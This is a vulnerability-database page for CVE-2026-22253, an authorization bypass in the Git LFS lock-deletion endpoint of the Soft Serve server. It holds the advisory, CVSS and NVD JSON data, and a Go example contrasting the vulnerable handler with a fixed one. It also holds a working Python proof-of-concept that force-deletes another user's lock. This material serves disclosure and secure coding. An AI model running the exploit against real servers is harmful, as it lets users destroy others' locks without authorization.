Security Vulnerability Report
CVE-2026-22253 CVSS 5.4 MEDIUM

CVE-2026-22253

Published: 2026-01-08 19:16:00
Last Modified: 2026-02-02 17:09:22

Description

Soft Serve is a self-hostable Git server for the command line. Prior to version 0.11.2, an authorization bypass in the LFS lock deletion endpoint allows any authenticated user with repository write access to delete locks owned by other users by setting the force flag. The vulnerable code path processes force deletions before retrieving user context, bypassing ownership validation entirely. This issue has been patched in version 0.11.2.
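The ordering flaw the description names (force handled before the caller is resolved) comes down to a few lines of handler code. The Go program below is an added example written for this page, not Soft Serve's code or its patch: it models an LFS unlock handler twice against an in-memory lock table, once with the vulnerable ordering and once with the caller resolved first. The lock table, the user names, the rule that only an admin may force-unlock someone else's lock, and the bearer-token-equals-username lookup are assumptions made for the example; the request path and the {"force": true} body follow the Git LFS File Locking API, which is what Soft Serve's LFS endpoint implements.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Lock is a minimal LFS lock record (constructed for this example).
type Lock struct {
	ID    int64
	Owner string
}

// unlockRequest is the body of POST .../info/lfs/locks/{id}/unlock in the
// Git LFS File Locking API; force asks to remove a lock the caller does not own.
type unlockRequest struct {
	Force bool `json:"force"`
}

// Server is a toy lock service: an in-memory lock table plus the users allowed to
// force-unlock other people's locks (an assumption of this example). Repository
// write access is assumed to have been checked by earlier middleware, as in the advisory.
type Server struct {
	locks  map[int64]Lock
	admins map[string]bool
}

func NewExampleServer() *Server {
	return &Server{
		locks:  map[int64]Lock{1: {ID: 1, Owner: "alice"}, 2: {ID: 2, Owner: "carol"}},
		admins: map[string]bool{"admin": true},
	}
}

// currentUser resolves the caller from the Authorization header. Assumption for
// the example: the bearer token is just the user name; a real server validates it.
func currentUser(r *http.Request) (string, bool) {
	h := r.Header.Get("Authorization")
	user := strings.TrimPrefix(h, "Bearer ")
	return user, strings.HasPrefix(h, "Bearer ") && user != ""
}

func deny(w http.ResponseWriter, code int) { http.Error(w, http.StatusText(code), code) }

func (s *Server) remove(w http.ResponseWriter, id int64) {
	delete(s.locks, id)
	fmt.Fprintf(w, `{"lock":{"id":"%d"}}`, id) // 200 with the deleted lock, as in the LFS spec
}

type unlockHandler func(w http.ResponseWriter, r *http.Request, id int64)

// VulnerableUnlock reproduces the ordering flaw the advisory describes: the force
// branch runs before the caller is identified, so ownership is never compared
// for a force request.
func (s *Server) VulnerableUnlock(w http.ResponseWriter, r *http.Request, id int64) {
	var req unlockRequest
	if err := json.NewDecoder(r.Body).Decode(&req); err != nil { deny(w, http.StatusBadRequest); return }
	lock, ok := s.locks[id]
	if !ok { deny(w, http.StatusNotFound); return }
	if req.Force { // BUG: no user context yet, so any writer can delete any lock
		s.remove(w, id)
		return
	}
	user, ok := currentUser(r)
	if !ok { deny(w, http.StatusUnauthorized); return }
	if lock.Owner != user { deny(w, http.StatusForbidden); return }
	s.remove(w, id)
}

// FixedUnlock resolves the caller before anything else, then applies one rule:
// the owner may unlock, and force lets only an admin remove someone else's lock.
func (s *Server) FixedUnlock(w http.ResponseWriter, r *http.Request, id int64) {
	user, ok := currentUser(r)
	if !ok { deny(w, http.StatusUnauthorized); return }
	var req unlockRequest
	if err := json.NewDecoder(r.Body).Decode(&req); err != nil { deny(w, http.StatusBadRequest); return }
	lock, ok := s.locks[id]
	if !ok { deny(w, http.StatusNotFound); return }
	if lock.Owner != user && !(req.Force && s.admins[user]) { deny(w, http.StatusForbidden); return }
	s.remove(w, id)
}

// TryUnlock sends one unlock request through h and returns the HTTP status code.
func (s *Server) TryUnlock(h unlockHandler, user string, id int64, force bool) int {
	path := fmt.Sprintf("/repo.git/info/lfs/locks/%d/unlock", id)
	r := httptest.NewRequest(http.MethodPost, path, strings.NewReader(fmt.Sprintf(`{"force":%t}`, force)))
	r.Header.Set("Authorization", "Bearer "+user)
	w := httptest.NewRecorder()
	h(w, r, id)
	return w.Code
}

func main() {
	v, f := NewExampleServer(), NewExampleServer()
	fmt.Println("vulnerable, bob force-unlocks alice's lock:", v.TryUnlock(v.VulnerableUnlock, "bob", 1, true))
	fmt.Println("fixed, bob force-unlocks alice's lock:", f.TryUnlock(f.FixedUnlock, "bob", 1, true))
	fmt.Println("fixed, alice unlocks her own lock:", f.TryUnlock(f.FixedUnlock, "alice", 1, false))
	fmt.Println("fixed, admin force-unlocks carol's lock:", f.TryUnlock(f.FixedUnlock, "admin", 2, true))
}
```

Run it with go run: the vulnerable handler answers 200 when bob force-unlocks alice's lock, the fixed handler answers 403 for the same request and still lets the owner or an admin through. The review habit to take from it is to resolve the principal before reading any request flag that widens authority, and then to make the force decision a single predicate over caller, owner and role rather than an early return.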

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:* - VULNERABLE
soft-serve < 0.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-22253 PoC - LFS Lock Deletion Authorization Bypass
# Target: Soft Serve Git Server < 0.11.2
# Attack: an authenticated user with repository write access deletes a lock
# owned by another user by setting the Git LFS "force" flag on the unlock
# request; the vulnerable server honours force before it resolves the caller.

TARGET_URL = "http://target-server.com"
API_TOKEN = "your-authenticated-user-token"
TARGET_REPO = "vulnerable-repo"
TARGET_LOCK_ID = 123  # lock ID owned by another user

# Git LFS clients send and accept this media type on every locking call.
LFS_JSON = "application/vnd.git-lfs+json"


def delete_lfs_lock_with_force(base_url=TARGET_URL, token=API_TOKEN,
                               repo=TARGET_REPO, lock_id=TARGET_LOCK_ID):
    """
    Exploit the authorization bypass in the LFS lock deletion endpoint.
    The vulnerable code path processes force deletions before validating
    ownership, so the request succeeds for a lock the caller does not own.
    """
    headers = {
        # Adjust to the scheme your server accepts; Git LFS clients usually
        # send HTTP Basic with an access token as the password.
        "Authorization": f"Bearer {token}",
        "Accept": LFS_JSON,
        "Content-Type": LFS_JSON,
    }
    # force=true is the flag that triggers the vulnerability.
    payload = {"force": True}

    # In the Git LFS File Locking API a lock is deleted with
    # POST .../locks/{id}/unlock under the repository's LFS endpoint, which
    # clients derive by appending /info/lfs to the remote URL; Soft Serve
    # serves that API, so there is no separate REST DELETE route for locks.
    url = f"{base_url}/{repo}.git/info/lfs/locks/{lock_id}/unlock"

    print(f"[*] Sending lock deletion request to: {url}")
    print(f"[*] Target lock ID: {lock_id}")
    print(f"[*] Force flag: {payload['force']}")

    response = requests.post(url, json=payload, headers=headers, timeout=10)

    if response.status_code in (200, 204):
        print("[+] VULNERABLE: lock deleted via authorization bypass")
        print(f"[+] Response: {response.text}")
        return True

    print(f"[-] Request failed with status: {response.status_code}")
    print(f"[-] Response: {response.text}")
    return False


if __name__ == "__main__":
    delete_lfs_lock_with_force()
```

References

https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-6jm8-x3g6-r33j (Vendor Advisory, Exploit)
https://github.com/charmbracelet/soft-serve/commit/000ab5164f0be68cf1ea6b6e7227f11c0e388a42 (Patch)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22253",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-08T19:15:59.950",
    "lastModified": "2026-02-02T17:09:22.447",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Soft Serve is a self-hostable Git server for the command line. Prior to version 0.11.2, an authorization bypass in the LFS lock deletion endpoint allows any authenticated user with repository write access to delete locks owned by other users by setting the force flag. The vulnerable code path processes force deletions before retrieving user context, bypassing ownership validation entirely. This issue has been patched in version 0.11.2."
      },
      {
        "lang": "es",
        "value": "Soft Serve es un servidor Git autoalojable para la línea de comandos. Antes de la versión 0.11.2, una omisión de autorización en el endpoint de eliminación de bloqueos LFS permite a cualquier usuario autenticado con acceso de escritura al repositorio eliminar bloqueos propiedad de otros usuarios al establecer la bandera de forzado. La ruta de código vulnerable procesa las eliminaciones forzadas antes de recuperar el contexto del usuario, omitiendo completamente la validación de propiedad. Este problema ha sido parcheado en la versión 0.11.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-863"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:*",
                "versionEndExcluding": "0.11.2",
                "matchCriteriaId": "4E11AA52-59BD-42E8-AF0F-EF9490942F6C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/charmbracelet/soft-serve/commit/000ab5164f0be68cf1ea6b6e7227f11c0e388a42",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-6jm8-x3g6-r33j",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```